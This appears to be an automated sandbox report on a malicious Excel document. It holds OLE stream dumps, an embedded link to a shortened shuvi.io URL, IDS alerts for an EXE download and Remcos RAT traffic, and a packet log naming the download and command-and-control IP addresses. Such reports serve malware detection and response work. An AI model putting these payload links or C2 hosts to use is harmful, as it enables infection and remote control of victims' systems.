                                                                File Type:dBase III DBT, version number 0, next free block index 65534, 1st item "\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377"
                                                                Stream Size:90976
                                                                Entropy:1.885975041684416
                                                                Base64 Encoded:True
                                                                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . 0 c . . . . . . . . . . P . . . . . . . X . . . . . . . d . . . . . . . p . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . ; { ) . @ . . . . Z % . } . @ . . . . . . . . . . . . . . . G . . . t b . . . . . . . . u . 2 . . . . . . . . . 2 . . . . ! . . . . . . . . . . v . . . ! . . A . . .
                                                                Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 30 63 01 00 09 00 00 00 01 00 00 00 50 00 00 00 04 00 00 00 58 00 00 00 08 00 00 00 64 00 00 00 12 00 00 00 70 00 00 00 0b 00 00 00 88 00 00 00 0c 00 00 00 94 00 00 00 0d 00 00 00 a0 00 00 00 13 00 00 00 ac 00 00 00 11 00 00 00 b4 00 00 00
                                                                General
                                                                Stream Path:MBD0043CF7E/MBD0018D4CE/\x1Ole
                                                                CLSID:
                                                                File Type:data
                                                                Stream Size:20
                                                                Entropy:0.5689955935892812
                                                                Base64 Encoded:False
                                                                Data ASCII:. . . . . . . . . . . . . . . . . . . .
                                                                Data Raw:01 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                General
                                                                Stream Path:MBD0043CF7E/MBD0018D4CE/\x3ObjInfo
                                                                CLSID:
                                                                File Type:data
                                                                Stream Size:4
                                                                Entropy:0.8112781244591328
                                                                Base64 Encoded:False
                                                                Data ASCII:. . . .
                                                                Data Raw:00 00 03 00
                                                                General
                                                                Stream Path:MBD0043CF7E/MBD0018D4CE/Contents
                                                                CLSID:
                                                                File Type:Corel Photo-Paint image, version 9, 716 x 547 RGB 24 bits, 11811024 micro dots/mm, 4 blocks, array offset 0x13c
                                                                Stream Size:197671
                                                                Entropy:6.989042939766534
                                                                Base64 Encoded:True
                                                                Data ASCII:C P T 9 F I L E . . . . . . . . . . . . . . . . 8 . 8 . . . . . . . . . . . . . . . . . . . . < . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                Data Raw:43 50 54 39 46 49 4c 45 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 38 b4 00 d0 38 b4 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 01 00 94 00 00 00 3c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                General
                                                                Stream Path:MBD0043CF7E/MBD002A52B4/\x1CompObj
                                                                CLSID:
                                                                File Type:data
                                                                Stream Size:114
                                                                Entropy:4.219515110876372
                                                                Base64 Encoded:False
                                                                Data ASCII:. . . . . . 0 . . . . . . . . . . . . . F ! . . . M i c r o s o f t O f f i c e E x c e l W o r k s h e e t . . . . . E x c e l M L 1 2 . . . . . E x c e l . S h e e t . 1 2 . 9 q . . . . . . . . . . . .
                                                                Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 30 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 21 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 57 6f 72 6b 73 68 65 65 74 00 0a 00 00 00 45 78 63 65 6c 4d 4c 31 32 00 0f 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 31 32 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                                                General
                                                                Stream Path:MBD0043CF7E/MBD002A52B4/Package
                                                                CLSID:
                                                                File Type:Microsoft Excel 2007+
                                                                Stream Size:50945
                                                                Entropy:7.631071730257267
                                                                Base64 Encoded:True
                                                                Data ASCII:P K . . . . . . . . . . ! . E o . . . . . . . . . [ C o n t e n t _ T y p e s ] . x m l . ( . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                Data Raw:50 4b 03 04 14 00 06 00 08 00 00 00 21 00 e3 45 b7 6f 8c 01 00 00 c0 05 00 00 13 00 ce 01 5b 43 6f 6e 74 65 6e 74 5f 54 79 70 65 73 5d 2e 78 6d 6c 20 a2 ca 01 28 a0 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                General
                                                                Stream Path:MBD0043CF7E/MBD002A56E1/\x1CompObj
                                                                CLSID:
                                                                File Type:data
                                                                Stream Size:114
                                                                Entropy:4.219515110876372
                                                                Base64 Encoded:False
                                                                Data ASCII:. . . . . . 0 . . . . . . . . . . . . . F ! . . . M i c r o s o f t O f f i c e E x c e l W o r k s h e e t . . . . . E x c e l M L 1 2 . . . . . E x c e l . S h e e t . 1 2 . 9 q . . . . . . . . . . . .
                                                                Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 30 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 21 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 57 6f 72 6b 73 68 65 65 74 00 0a 00 00 00 45 78 63 65 6c 4d 4c 31 32 00 0f 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 31 32 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                                                General
                                                                Stream Path:MBD0043CF7E/MBD002A56E1/Package
                                                                CLSID:
                                                                File Type:Microsoft Excel 2007+
                                                                Stream Size:31124
                                                                Entropy:7.746149934092623
                                                                Base64 Encoded:True
                                                                Data ASCII:P K . . . . . . . . . . ! . . p @ . . . . . . . . . [ C o n t e n t _ T y p e s ] . x m l . ( . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                Data Raw:50 4b 03 04 14 00 06 00 08 00 00 00 21 00 13 70 40 80 a3 01 00 00 e2 05 00 00 13 00 cf 01 5b 43 6f 6e 74 65 6e 74 5f 54 79 70 65 73 5d 2e 78 6d 6c 20 a2 cb 01 28 a0 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                General
                                                                Stream Path:MBD0043CF7E/MBD002A5E23/\x1CompObj
                                                                CLSID:
                                                                File Type:data
                                                                Stream Size:114
                                                                Entropy:4.25248375192737
                                                                Base64 Encoded:True
                                                                Data ASCII:. . . . . . . . . . . . . . . . . . . F & . . . M i c r o s o f t O f f i c e E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . 9 q . . . . . . . . . . . .
                                                                Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 26 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                                                General
                                                                Stream Path:MBD0043CF7E/MBD002A5E23/\x5DocumentSummaryInformation
                                                                CLSID:
                                                                File Type:data
                                                                Stream Size:484
                                                                Entropy:3.922883556049869
                                                                Base64 Encoded:True
                                                                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , D . . . . . . . . . . + , D . . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . X . . . . . . . ` . . . . . . . h . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . I N V . . . . . P L . . . . . D P L - 1 . . . . . I N V ! P r i n t _ A r e a . . . . . P L ! P r i n t _ A r e a . . . . . . . . . . . . . . . . .
                                                                Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 02 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 44 00 00 00 05 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 44 01 00 00 00 01 00 00 08 00 00 00 01 00 00 00 48 00 00 00 17 00 00 00 50 00 00 00 0b 00 00 00 58 00 00 00 10 00 00 00 60 00 00 00 13 00 00 00 68 00 00 00 16 00 00 00 70 00 00 00 0d 00 00 00
                                                                General
                                                                Stream Path:MBD0043CF7E/MBD002A5E23/\x5SummaryInformation
                                                                CLSID:
                                                                File Type:data
                                                                Stream Size:19956
                                                                Entropy:3.056974324659501
                                                                Base64 Encoded:True
                                                                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . M . . . . . . . . . . P . . . . . . . X . . . . . . . d . . . . . . . t . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . y d t . . . . . . . . . 9 1 9 7 4 . . . . . . . . . . . W P S O f f i c e . . @ . . . . E . w . @ . . . . . 2 . @ . . . . . _ . . . . . . . . . . G . . . . M . . . . . . . . ? . . . . . . . . . | & . . . . . . . . . . . . . . & . . . " W M F C . . . . .
                                                                Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 c4 4d 00 00 09 00 00 00 01 00 00 00 50 00 00 00 04 00 00 00 58 00 00 00 08 00 00 00 64 00 00 00 12 00 00 00 74 00 00 00 0b 00 00 00 88 00 00 00 0c 00 00 00 94 00 00 00 0d 00 00 00 a0 00 00 00 13 00 00 00 ac 00 00 00 11 00 00 00 b4 00 00 00
                                                                General
                                                                Stream Path:MBD0043CF7E/MBD002A5E23/Workbook
                                                                CLSID:
                                                                File Type:Applesoft BASIC program data, first line number 16
                                                                Stream Size:95624
                                                                Entropy:3.889652332882722
                                                                Base64 Encoded:True
                                                                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . . . 9 1 9 7 4 B . . . . a . . . . . . . . = . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . . . Q | 9 . . . . . . . X . @ . . . . . . . . . . " . . . . . . . . . . . .
                                                                Data Raw:09 08 10 00 00 06 05 00 ab 1f cd 07 c9 00 02 00 06 04 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 05 00 00 39 31 39 37 34 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                General
                                                                Stream Path:MBD0043CF7E/MBD002A6130/\x1CompObj
                                                                CLSID:
                                                                File Type:data
                                                                Stream Size:94
                                                                Entropy:4.345966460061678
                                                                Base64 Encoded:False
                                                                Data ASCII:. . . . . . e . . D E S T . . . . . . A c r o b a t D o c u m e n t . . . . . . . . . A c r o E x c h . D o c u m e n t . D C . 9 q . . . . . . . . . . . .
                                                                Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 65 ca 01 b8 fc a1 d0 11 85 ad 44 45 53 54 00 00 11 00 00 00 41 63 72 6f 62 61 74 20 44 6f 63 75 6d 65 6e 74 00 00 00 00 00 15 00 00 00 41 63 72 6f 45 78 63 68 2e 44 6f 63 75 6d 65 6e 74 2e 44 43 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                                                General
                                                                Stream Path:MBD0043CF7E/MBD002A6130/\x1Ole
                                                                CLSID:
                                                                File Type:data
                                                                Stream Size:64
                                                                Entropy:2.935667186688699
                                                                Base64 Encoded:False
                                                                Data ASCII:. . . . . . . . . . . . . . . . 0 . . . . . . . . . . . . . . . . . F . . . . ! . . . . . F e u i l 1 ! O b j e c t 1 8 4 .
                                                                Data Raw:01 00 00 02 08 00 00 00 00 00 00 00 00 00 00 00 30 00 00 00 04 03 00 00 00 00 00 00 c0 00 00 00 00 00 00 46 02 00 00 00 21 00 12 00 00 00 46 65 75 69 6c 31 21 4f 62 6a 65 63 74 20 31 38 34 00
                                                                General
                                                                Stream Path:MBD0043CF7E/MBD002A6130/CONTENTS
                                                                CLSID:
                                                                File Type:PDF document, version 1.7
                                                                Stream Size:21760
                                                                Entropy:7.954015192696893
                                                                Base64 Encoded:True
                                                                Data ASCII:% P D F - 1 . 7 . % . 1 0 o b j . < < . / T y p e / C a t a l o g . / P a g e s 2 0 R . / A c r o F o r m 2 4 0 R . > > . e n d o b j . 8 0 o b j . < < . / L e n g t h 2 . > > . s t r e a m . . q . . . e n d s t r e a m . e n d o b j . 9 0 o b j . < < . / L e n g t h 2 . > > . s t r e a m . . q . . . e n d s t r e a m . e n d o b j . 1 0 0 o b j . < < . / L e n g t h 3 8 . / F i l t e r / F l a t e D e c o d e . > > . s t r e a m . . x + 2 7 2 3 7 U 0 . B . . s = # . 3
                                                                Data Raw:25 50 44 46 2d 31 2e 37 0a 25 f6 e4 fc df 0a 31 20 30 20 6f 62 6a 0a 3c 3c 0a 2f 54 79 70 65 20 2f 43 61 74 61 6c 6f 67 0a 2f 50 61 67 65 73 20 32 20 30 20 52 0a 2f 41 63 72 6f 46 6f 72 6d 20 32 34 20 30 20 52 0a 3e 3e 0a 65 6e 64 6f 62 6a 0a 38 20 30 20 6f 62 6a 0a 3c 3c 0a 2f 4c 65 6e 67 74 68 20 32 0a 3e 3e 0a 73 74 72 65 61 6d 0d 0a 71 0a 0d 0a 65 6e 64 73 74 72 65 61 6d 0a 65
                                                                General
                                                                Stream Path:MBD0043CF7E/Workbook
                                                                CLSID:
                                                                File Type:Applesoft BASIC program data, first line number 16
                                                                Stream Size:218908
                                                                Entropy:7.606771386739727
                                                                Base64 Encoded:True
                                                                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . . . B . . . . a . . . . . . . . = . . . . . . . . . . . . . . . . b . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . ` < x - 9 . . . . . . . X . @ . . . . . . . . . . " . . . . . . . . . . . . . . . . .
                                                                Data Raw:09 08 10 00 00 06 05 00 ab 1f cd 07 c1 00 01 00 06 04 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 02 00 00 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                General
                                                                Stream Path:MBD0043CF7F/\x1Ole
                                                                CLSID:
                                                                File Type:data
                                                                Stream Size:328
                                                                Entropy:5.343575036749917
                                                                Base64 Encoded:False
                                                                Data ASCII:. . . . 0 . . W . . . . . . . . . . . . . . . . y . . . K . . . . h . t . t . p . s . : . / . / . s . h . u . v . i . . . i . o . / . 7 . a . l . 0 . e . Y . . . o . . ! + . ? . q . @ D z i y x . { . G U U 9 . ( = . . . A . * 3 U I r \\ T : G ' D ` ' . 9 . . . . . . . . . . . . . . . . b . . . p . P . n . 5 . w . w . H . f . 8 . J . U . v . p . 3 . 4 . s . 8 . M . y . H . x . 5 . A . V . M . k . l . T . K . i . g . b . t . 2 . L . A . X . 8 . M . E . v . C . p . g . x . 5 . v . 6 . . . T 2 C 2 . ) y . 4 . Z
                                                                Data Raw:01 00 00 02 a9 30 13 7f 57 e3 8f 11 00 00 00 00 00 00 00 00 00 00 00 00 86 00 00 00 e0 c9 ea 79 f9 ba ce 11 8c 82 00 aa 00 4b a9 0b 82 00 00 00 68 00 74 00 74 00 70 00 73 00 3a 00 2f 00 2f 00 73 00 68 00 75 00 76 00 69 00 2e 00 69 00 6f 00 2f 00 37 00 61 00 6c 00 30 00 65 00 59 00 00 00 a3 b2 87 6f 05 06 bd 9f 21 2b 1b d6 f0 3f 82 15 cd 71 d6 8c ba 40 44 e0 9c c9 7a 69 79 f4 e9 78
                                                                General
                                                                Stream Path:Workbook
                                                                CLSID:
                                                                File Type:Applesoft BASIC program data, first line number 16
                                                                Stream Size:339347
                                                                Entropy:7.998777703195241
                                                                Base64 Encoded:True
                                                                Data ASCII:. . . . . . . . . . . . . . . . . / . 6 . . . . . . . D & 2 ^ L x " F L @ / J z d 6 ' [ . f 3 ` . . . . . . . ( p . . . \\ . p . V C u . 8 q w . } . 5 v . ( O . n . m 4 . ) ! . . . 0 x . ~ @ < X . b . @ x , T ! . . R X . . r d . . ! . # ! ] ] - L B . . . a . . . 8 3 . . . = . . . " C / . . . . . $ . 5 U A ^ L . . . . . . . . u . . . . " . . . . . 4 . . . . . . . h = . . . g r E . . h x . 1 ; @ . . . . . . . . % . " . . . } q . . . . ] . . . . . S . . . + 1 . . . 0 . m } . 9 c . 4 B x R 5 9 . 1 . . . ~ & 8
                                                                Data Raw:09 08 10 00 00 06 05 00 ab 1f cd 07 c1 00 01 00 06 04 00 00 2f 00 36 00 01 00 01 00 01 00 87 99 44 a5 26 32 c8 5e f0 e6 4c 8e 78 22 46 92 4c 40 a5 2f 4a 8a 7a ad fa f0 b8 b7 d6 64 ab b8 b1 b5 36 27 cd 5b fe e5 cb a1 a4 89 66 33 60 9d e1 00 02 00 b0 04 c1 00 02 00 28 70 e2 00 00 00 5c 00 70 00 ab 91 ff f7 b6 d2 56 43 75 0a 38 e5 71 98 96 d1 77 f3 c5 15 a8 7d 1f 35 76 17 28 8f 8c 4f
                                                                General
                                                                Stream Path:_VBA_PROJECT_CUR/PROJECT
                                                                CLSID:
                                                                File Type:ASCII text, with CRLF line terminators
                                                                Stream Size:527
                                                                Entropy:5.280980037440372
                                                                Base64 Encoded:True
                                                                Data ASCII:I D = " { F A 3 F 4 E C 7 - 9 3 8 D - 4 4 6 6 - A E B 0 - 5 F D 4 6 C 0 4 A E 1 F } " . . D o c u m e n t = T h i s W o r k b o o k / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 1 / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 2 / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 3 / & H 0 0 0 0 0 0 0 0 . . N a m e = " V B A P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " A 1 A 3 8 1 C 7 8 5 C 7 8 5 C 7 8
                                                                Data Raw:49 44 3d 22 7b 46 41 33 46 34 45 43 37 2d 39 33 38 44 2d 34 34 36 36 2d 41 45 42 30 2d 35 46 44 34 36 43 30 34 41 45 31 46 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 57 6f 72 6b 62 6f 6f 6b 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 31 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 32 2f 26 48 30 30 30
                                                                General
                                                                Stream Path:_VBA_PROJECT_CUR/PROJECTwm
                                                                CLSID:
                                                                File Type:data
                                                                Stream Size:104
                                                                Entropy:3.0488640812019017
                                                                Base64 Encoded:False
                                                                Data ASCII:T h i s W o r k b o o k . T . h . i . s . W . o . r . k . b . o . o . k . . . S h e e t 1 . S . h . e . e . t . 1 . . . S h e e t 2 . S . h . e . e . t . 2 . . . S h e e t 3 . S . h . e . e . t . 3 . . . . .
                                                                Data Raw:54 68 69 73 57 6f 72 6b 62 6f 6f 6b 00 54 00 68 00 69 00 73 00 57 00 6f 00 72 00 6b 00 62 00 6f 00 6f 00 6b 00 00 00 53 68 65 65 74 31 00 53 00 68 00 65 00 65 00 74 00 31 00 00 00 53 68 65 65 74 32 00 53 00 68 00 65 00 65 00 74 00 32 00 00 00 53 68 65 65 74 33 00 53 00 68 00 65 00 65 00 74 00 33 00 00 00 00 00
                                                                General
                                                                Stream Path:_VBA_PROJECT_CUR/VBA/_VBA_PROJECT
                                                                CLSID:
                                                                File Type:data
                                                                Stream Size:2644
                                                                Entropy:3.9981836915909534
                                                                Base64 Encoded:False
                                                                Data ASCII:a . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 0 . # . 9 . # . C . : . \\ . P . R . O . G . R . A . ~ . 2 . \\ . C . O . M . M . O . N . ~ . 1 . \\ . M . I . C . R . O . S . ~ . 1 . \\ . V . B . A . \\ . V . B . A . 6 . \\ . V . B . E . 6 . . . D . L . L . # . V . i . s . u . a . l . . B . a . s . i . c . . F . o . r .
                                                                Data Raw:cc 61 88 00 00 01 00 ff 09 40 00 00 09 04 00 00 e4 04 01 00 00 00 00 00 00 00 00 00 01 00 04 00 02 00 fa 00 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 30 00 23 00
                                                                General
                                                                Stream Path:_VBA_PROJECT_CUR/VBA/dir
                                                                CLSID:
                                                                File Type:data
                                                                Stream Size:553
                                                                Entropy:6.368849873685529
                                                                Base64 Encoded:True
                                                                Data ASCII:. % . . . . . . . . 0 * . . . . p . . H . . . . d . . . . . . . V B A P r o j e c t . . 4 . . @ . . j . . . = . . . . r . . . . . . . . . z . . i . . . . J < . . . . . r s t d o l e > . . . s . t . d . o . l . e . . . h . % . ^ . . * \\ G { 0 0 0 2 0 4 3 0 - . . . . . C . . . . . . 0 0 4 . 6 } # 2 . 0 # 0 . # C : \\ W i n d . o w s \\ S y s W O W 6 4 \\ . e 2 . . t l b # O L E . A u t o m a t i . o n . ` . . E O f f D i c E O . f . i . c E . . E . 2 D F 8 D 0 4 C . - 5 B F A - 1 0 1 B - B D E 5 E A A C 4 .
                                                                Data Raw:01 25 b2 80 01 00 04 00 00 00 01 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e4 04 04 00 0a 00 1c 00 56 42 41 50 72 6f 6a 65 88 63 74 05 00 34 00 00 40 02 14 6a 06 02 0a 3d 02 0a 07 02 72 01 14 08 05 06 12 09 02 12 7a 05 1a 69 08 94 00 0c 02 4a 3c 02 0a 16 00 01 72 80 73 74 64 6f 6c 65 3e 02 19 00 73 00 74 00 64 00 6f 00 80 6c 00 65 00 0d 00 68 00 25 02 5e 00 03 2a 5c 47
                                                                TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                2024-10-12T16:39:56.817090+02002022050ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M11104.168.7.2580192.168.2.2249170TCP
                                                                2024-10-12T16:39:56.905812+02002022051ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M21104.168.7.2580192.168.2.2249170TCP
                                                                2024-10-12T16:40:02.455454+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.2249171107.173.4.162404TCP
                                                                2024-10-12T16:40:03.589923+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.2249172107.173.4.162404TCP
                                                                2024-10-12T16:40:03.717468+02002803304ETPRO MALWARE Common Downloader Header Pattern HCa3192.168.2.2249173178.237.33.5080TCP
                                                                TimestampSource PortDest PortSource IPDest IP
                                                                Oct 12, 2024 16:39:42.734498024 CEST49161443192.168.2.22188.114.96.3
                                                                Oct 12, 2024 16:39:42.734538078 CEST44349161188.114.96.3192.168.2.22
                                                                Oct 12, 2024 16:39:42.734878063 CEST49161443192.168.2.22188.114.96.3
                                                                Oct 12, 2024 16:39:42.740701914 CEST49161443192.168.2.22188.114.96.3
                                                                Oct 12, 2024 16:39:42.740715981 CEST44349161188.114.96.3192.168.2.22
                                                                Oct 12, 2024 16:39:43.218147993 CEST44349161188.114.96.3192.168.2.22
                                                                Oct 12, 2024 16:39:43.218585968 CEST49161443192.168.2.22188.114.96.3
                                                                Oct 12, 2024 16:39:43.223297119 CEST49161443192.168.2.22188.114.96.3
                                                                Oct 12, 2024 16:39:43.223304033 CEST44349161188.114.96.3192.168.2.22
                                                                Oct 12, 2024 16:39:43.223670006 CEST44349161188.114.96.3192.168.2.22
                                                                Oct 12, 2024 16:39:43.223809004 CEST49161443192.168.2.22188.114.96.3
                                                                Oct 12, 2024 16:39:43.306282997 CEST49161443192.168.2.22188.114.96.3
                                                                Oct 12, 2024 16:39:43.351413012 CEST44349161188.114.96.3192.168.2.22
                                                                Oct 12, 2024 16:39:43.488497972 CEST44349161188.114.96.3192.168.2.22
                                                                Oct 12, 2024 16:39:43.488720894 CEST44349161188.114.96.3192.168.2.22
                                                                Oct 12, 2024 16:39:43.488785028 CEST49161443192.168.2.22188.114.96.3
                                                                Oct 12, 2024 16:39:43.488869905 CEST49161443192.168.2.22188.114.96.3
                                                                Oct 12, 2024 16:39:43.490115881 CEST49161443192.168.2.22188.114.96.3
                                                                Oct 12, 2024 16:39:43.490124941 CEST44349161188.114.96.3192.168.2.22
                                                                Oct 12, 2024 16:39:43.506468058 CEST4916280192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:43.511353970 CEST8049162104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:43.511533976 CEST4916280192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:43.511533976 CEST4916280192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:43.516501904 CEST8049162104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:44.018225908 CEST8049162104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:44.018353939 CEST8049162104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:44.018385887 CEST8049162104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:44.018419027 CEST8049162104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:44.018454075 CEST8049162104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:44.018487930 CEST8049162104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:44.018485069 CEST4916280192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:44.018485069 CEST4916280192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:44.018486023 CEST4916280192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:44.018486023 CEST4916280192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:44.018524885 CEST8049162104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:44.018556118 CEST4916280192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:44.018556118 CEST4916280192.168.2.22104.168.7.25
